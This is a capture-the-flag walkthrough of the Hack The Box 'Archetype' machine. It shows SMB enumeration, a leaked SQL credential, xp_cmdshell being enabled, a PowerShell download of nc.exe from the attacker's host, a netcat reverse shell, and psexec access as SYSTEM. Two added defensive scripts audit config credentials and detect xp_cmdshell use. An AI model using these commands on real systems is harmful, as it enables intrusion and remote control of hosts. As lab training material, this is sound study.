ArcheType CTF – HTB
Enumeration
In the enumeration stage I start off with an Nmap scan of all TCP ports, with service detection and the vuln script category enabled.
sudo nmap -sV -A -p- --script vuln 10.10.10.27 -oN nmap.result
--------------------------------------------------------------
Nmap scan report for 10.10.10.27
Host is up (0.062s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000
|_sslv2-drown:
| vulners:
| cpe:/a:microsoft:sql_server:2017:
| CVE-2007-5090 7.5 https://vulners.com/cve/CVE-2007-5090
| CVE-2021-1636 6.5 https://vulners.com/cve/CVE-2021-1636
| CVE-2019-1068 6.5 https://vulners.com/cve/CVE-2019-1068
|_ CVE-2019-0819 4.0 https://vulners.com/cve/CVE-2019-0819
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
There are a couple of interesting ports open, among them 445 (SMB) and 1433 (MSSQL).
I’ll run ‘enum4linux’ against the server. The interesting takeaway from that scan is that the server doesn't require a username or password to open an SMB session.
enum4linux -H 10.10.10.27
-----------------------------
====================================
| Session Check on 10.10.10.27 |
====================================
[+] Server 10.10.10.27 allows sessions using username '', password ''
[+] Got domain/workgroup name:
We’ll try to connect to SMB using ‘smbclient’ and list the available shares.
smbclient -L //10.10.10.27
--------------------------
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
------------------------------
# Connect to backups
smbclient //10.10.10.27/backups
smb: \> ls
. D 0 Mon Jan 20 12:20:57 2020
.. D 0 Mon Jan 20 12:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 12:23:02 2020
10328063 blocks of size 4096. 8248445 blocks available
smb: \> get prod.dtsConfig
-----------------------
cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
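The prod.dtsConfig file above is an SSIS package configuration whose connection string carries a cleartext password and Persist Security Info=True. As an added example (not part of the original write-up), this script audits .dtsConfig content for exactly that pattern; the sample XML is constructed with placeholder values shaped like the real file.

```python
# Added example: audit SSIS .dtsConfig files for connection strings that embed
# a cleartext password. Sample input is constructed; all values are placeholders.
import xml.etree.ElementTree as ET

SAMPLE_DTSCONFIG = """<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="x" GeneratedFromPackageName="x" GeneratedFromPackageID="x" GeneratedDate="1.1.2020 00:00:00"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=EXAMPLE_PASSWORD;User ID=EXAMPLEDOM\\svc_example;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
<Configuration ConfiguredType="Property" Path="\\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Other;Provider=SQLNCLI10.1;</ConfiguredValue>
</Configuration>
</DTSConfiguration>"""

def parse_connection_string(value):
    """Split an OLE DB style 'Key=Value;Key=Value' string into a dict with lower-cased keys."""
    pairs = {}
    for part in value.split(";"):
        if "=" in part:
            key, _, val = part.partition("=")
            pairs[key.strip().lower()] = val.strip()
    return pairs

def find_cleartext_credentials(xml_text):
    """Return (property path, user id, reasons) for every ConnectionString
    property that stores a password in the clear or persists it."""
    findings = []
    root = ET.fromstring(xml_text)
    for conf in root.iter("Configuration"):
        path = conf.get("Path", "")
        if "[ConnectionString]" not in path:
            continue
        node = conf.find("ConfiguredValue")
        if node is None or not node.text:
            continue
        cs = parse_connection_string(node.text)
        reasons = []
        if cs.get("password") or cs.get("pwd"):
            reasons.append("password stored in cleartext; use Integrated Security or a protected config")
        if cs.get("persist security info", "").lower() == "true":
            reasons.append("Persist Security Info=True keeps the password readable on the connection object")
        if reasons:
            findings.append((path, cs.get("user id", "<none>"), reasons))
    return findings

if __name__ == "__main__":
    for path, user, reasons in find_cleartext_credentials(SAMPLE_DTSCONFIG):
        print(f"{path}: user {user}: {'; '.join(reasons)}")
```

Run it over the .dtsConfig files of a share such as ‘backups’ to find the connection strings that need to move to integrated authentication or a protected configuration source.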
Gain access
I found a username and a password. I'll use those credentials to try to connect to MSSQL with Impacket's ‘mssqlclient.py’.
mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
Impacket v0.9.24.dev1 - Copyright 2021 SecureAuth Corporation
Password:
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
From the help menu I can see that I can execute arbitrary commands on the SQL server through xp_cmdshell. I’ll use int0x33‘s ‘nc.exe’, send it to the target machine, and try to get a reverse shell.
# Terminal 1 attacker - in the same dir as nc.exe
sudo python3 -m http.server 8080
# Terminal 2 target SQL
SQL> enable_xp_cmdshell
SQL> reconfigure
SQL> xp_cmdshell "powershell wget http://10.10.14.117:8080/nc.exe -OutFile %temp%/nc.exe"
output
--------------------------------------------------------------------------------
NULL
# Terminal 1 attacker - nc.exe is sent from attacker to target
10.10.10.27 - - [17/Jun/2021 07:59:41] "GET /nc.exe HTTP/1.1" 200 -
# Terminal 3 attacker
sudo rlwrap nc -nlvp 443
listening on [any] 443 ...
# Terminal 2 target SQL
SQL> xp_cmdshell "%temp%/nc.exe -nv 10.10.14.117 443 -e cmd.exe"
# Terminal 3 attacker - reverse shell
connect to [10.10.14.117] from (UNKNOWN) [10.10.10.27] 49716
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
archetype\sql_svc
rlwrap gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell.
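On the server side, enabling xp_cmdshell as done above leaves a trail: sp_configure writes a "Configuration option '<name>' changed from <old> to <new>" line to the SQL Server ERRORLOG, and the first execution of an extended stored procedure logs which DLL was loaded for it. As an added example (not part of the original write-up), this script parses ERRORLOG-style lines and flags both; the log lines, timestamps and spids are constructed for the example.

```python
# Added example: detect xp_cmdshell being enabled or first used by scanning
# SQL Server ERRORLOG lines. Sample lines below are constructed.
import re
from collections import namedtuple

Finding = namedtuple("Finding", "timestamp spid option old new")

CONFIG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)
# Logged when an extended stored procedure is executed for the first time.
USE_RE = re.compile(r"to execute extended stored procedure '(?P<proc>xp_cmdshell)'")

# Options whose 0 -> 1 transition should raise an alert; extend as needed.
WATCHED = {"xp_cmdshell", "ole automation procedures"}

def parse_errorlog(lines):
    """Yield a Finding for every configuration-change line in the log."""
    for line in lines:
        m = CONFIG_RE.match(line.strip())
        if m:
            yield Finding(m["ts"], m["spid"], m["opt"].lower(), int(m["old"]), int(m["new"]))

def find_enabled_options(lines):
    """Return the findings where a watched option went from disabled to enabled."""
    return [f for f in parse_errorlog(lines)
            if f.option in WATCHED and f.old == 0 and f.new == 1]

def find_xp_cmdshell_use(lines):
    """Return the lines that record the first execution of xp_cmdshell."""
    return [line.strip() for line in lines if USE_RE.search(line)]

SAMPLE_ERRORLOG = [
    "2021-06-17 07:58:01.10 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2021-06-17 07:58:01.12 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2021-06-17 07:59:41.20 spid51      Using 'xpstar.dll' version '2017.140.1000' to execute extended stored procedure 'xp_cmdshell'. This is an informational message only; no user action is required.",
    "2021-06-17 08:30:44.00 spid60      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.",
]

if __name__ == "__main__":
    for f in find_enabled_options(SAMPLE_ERRORLOG):
        print(f"{f.timestamp} {f.spid}: '{f.option}' enabled (was {f.old})")
    for line in find_xp_cmdshell_use(SAMPLE_ERRORLOG):
        print("xp_cmdshell executed:", line)
```

The same text is raised as a Windows Application log event by SQL Server, so the regexes work unchanged on events forwarded to a SIEM.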
PrivEsc
Using carlospolop’s winPEAS.bat we can find possible privilege escalation vectors. It's an amazing tool that you should have in your toolbox, and it's available for Linux as well (linPEAS).
We’ll send ‘winPEAS.bat’ to the target using the same http.server.
SQL> xp_cmdshell "powershell wget http://10.10.14.117:8080/winPEAS.bat -OutFile %temp%/winpeas.bat"
# From the reverse shell
C:\Users\sql_svc> cd %temp%
C:\Users\sql_svc\AppData\Local\Temp>winpeas.bat
This runs winpeas.bat, which takes a while. In its output we find an interesting PowerShell history location, ‘C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine’. In it we find the password for ‘administrator’, which is ‘MEGACORP_4dm1n!!’. With that, we can use Impacket's psexec.py to log in as administrator and get the root flag.
psexec.py administrator@10.10.10.27
Impacket v0.9.24.dev1 - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file FfeDRNaS.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service qkmG on 10.10.10.27.....
[*] Starting service qkmG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Users\Administrator>cd Desktop
C:\Users\Administrator>dir
Directory of C:\Users\Administrator\Desktop
01/20/2020 06:42 AM <DIR> .
01/20/2020 06:42 AM <DIR> ..
02/25/2020 07:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 33,822,023,680 bytes free